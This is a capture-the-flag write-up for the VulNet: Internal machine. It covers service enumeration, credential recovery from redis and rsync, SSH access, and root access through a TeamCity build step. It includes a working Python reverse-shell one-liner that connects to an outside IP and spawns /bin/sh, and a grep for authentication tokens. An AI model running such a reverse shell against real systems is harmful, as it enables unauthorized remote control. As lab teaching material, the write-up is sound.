VulNet: Internal

Scanning

Let's run an nmap scan to find the open ports and the services running on them.

Enumeration

Let's check port 9090, which is running SMB.

Let's first look at what shares are on the system.

The Shares disk is interesting, so let's try to access it as an anonymous user.

We were able to access it. Let's cd into these directories and transfer all the files onto our machine.

Let's read the services.txt file.

Looks like we have the first flag.

Let's read the other files.

There is nothing interesting, so let's look at the other services running on the machine, starting with the RPC service running on port 111.

Looks like we have a directory, so let's mount it onto our machine. First let's create a directory called mount and then use the command to mount the directory.

Let's look for interesting files in the directory. There is an interesting file in the redis directory.

This is a configuration file, and there is a lot of information when we cat it, so let's search for "pass" strings to get some information about the passwords.

Now that we have the password, let's try to access redis and look for the second flag.

We have the second flag. Now let's look at the auth key. We cannot GET the key, so let's look at its key type.

Now that we know it's a list key type, let's read it.

We have a base64 string, let's decode it.

Looks like we have the credentials for the rsync service running on the system. Let's look at it in more detail and see what interesting files we can find.

Exploitation

Now we can either get the files onto our machine, or upload our SSH key and then log in to the machine over SSH.

First we have to create our SSH key and then upload it to the machine.

Now we can log in.

Let's read the user flag.

Privilege Escalation

Looking around, there is an interesting directory.

Let's look at this directory and read the readme file.

Let's look at the ports listening on the machine.

Something is running on port 8111. Let's set up port forwarding so that we can see what is running on this port.

Now let's go to localhost:8111 in the browser.

We have a TeamCity login page. Clicking on the Super User option shows that we need an authentication token to log in, so let's look for it on the machine.

grep -r "authentication token" 2>/dev/null

We have tokens, let's use one of them to log in. (None of them work except the last one.)

We are logged in.
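The login above worked because the token lines were readable by the low-privileged user. As an added example (not part of the original write-up), this audit walks a directory and reports files that contain the phrase from the grep above and are readable by group or other, with the token redacted. The sample file names, the token format and the helper names are assumptions constructed for the demonstration.

```python
import os
import re
import stat
import tempfile

# Phrase taken from the grep command above; the digit pattern is an assumption
# about how the token appears on the matching line.
PHRASE = re.compile(r"authentication token", re.IGNORECASE)
TOKEN = re.compile(r"\d{6,}")


def audit_token_exposure(root):
    """Return findings for files under root that contain the phrase and are
    readable by group or other. Token digits are redacted in the output."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            try:
                mode = stat.S_IMODE(os.stat(path).st_mode)
                with open(path, "r", errors="replace") as fh:
                    hits = [TOKEN.sub("<redacted>", ln.strip())
                            for ln in fh if PHRASE.search(ln)]
            except OSError:
                continue  # unreadable or vanished file: nothing to report
            if hits and mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append({"path": path, "mode": oct(mode), "lines": hits})
    return findings


def build_sample_tree():
    """Constructed sample logs (not taken from the target machine)."""
    root = tempfile.mkdtemp(prefix="token-audit-")
    samples = {
        "server-a.log": (0o644, "INFO startup\nSuper user authentication token: 1234567890123 (constructed)\n"),
        "server-b.log": (0o600, "Super user authentication token: 9876543210987 (constructed)\n"),
        "agent.log": (0o644, "INFO build finished\n"),
    }
    for name, (mode, text) in samples.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(text)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for f in audit_token_exposure(build_sample_tree()):
        print(f["mode"], f["path"], f["lines"])
```

Only server-a.log is reported: server-b.log holds a token but is owner-only, and agent.log has no token line.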

Let's try to create a new project.

Let's create a new Build Configuration.

Now let's go to the homepage and click on the project name.

Let's go to Edit Configuration Settings, then go to Build Steps and select Python.

Let's add a reverse shell to the Custom Script option that we can choose.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.8.64",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Let's now start a netcat listener on our machine.

Let's save the file and run it by clicking Run.

We have a shell as root, let's read the root flag.
